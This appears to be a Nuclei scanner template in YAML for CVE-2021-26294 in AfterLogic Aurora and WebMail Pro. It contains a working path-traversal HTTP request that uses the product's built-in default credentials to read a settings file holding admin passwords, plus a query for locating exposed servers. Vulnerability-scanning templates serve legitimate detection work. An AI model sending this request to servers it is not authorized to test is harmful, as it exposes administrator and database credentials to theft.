56 lines
2.0 KiB
YAML
56 lines
2.0 KiB
YAML
id: CVE-2021-26294
|
||
|
||
info:
|
||
name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure
|
||
author: johnk3r
|
||
severity: high
|
||
description: |
|
||
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root.
|
||
reference:
|
||
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2021-26294
|
||
- https://github.com/Threekiii/Awesome-POC
|
||
- https://github.com/soosmile/POC
|
||
- https://github.com/tzwlhack/Vulnerability
|
||
classification:
|
||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||
cvss-score: 7.5
|
||
cve-id: CVE-2021-26294
|
||
cwe-id: CWE-22
|
||
epss-score: 0.21969
|
||
epss-percentile: 0.96457
|
||
cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:*
|
||
metadata:
|
||
verified: true
|
||
max-request: 1
|
||
vendor: afterlogic
|
||
product: aurora
|
||
fofa-query: "X-Server: AfterlogicDAVServer"
|
||
tags: cve2021,cve,afterlogic,exposure,AfterLogic
|
||
|
||
http:
|
||
- raw:
|
||
- |
|
||
GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1
|
||
Host: {{Hostname}}
|
||
Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
|
||
|
||
matchers-condition: and
|
||
matchers:
|
||
- type: word
|
||
part: body
|
||
words:
|
||
- "<AdminLogin>"
|
||
- "<AdminPassword>"
|
||
- "<DBHost>"
|
||
condition: and
|
||
|
||
- type: word
|
||
part: header
|
||
words:
|
||
- "application/octet-stream"
|
||
|
||
- type: status
|
||
status:
|
||
- 200
|
||
# digest: 4b0a00483046022100946db71c9c0e5b872bed57665de3060aba3d7e263f8bb7d763c03046709ab78a022100a5715e19435bd033d5da6cc980eceb717e143e184e8342d77f893624fec063a0:922c64590222798bb761d5b6d8e72950 |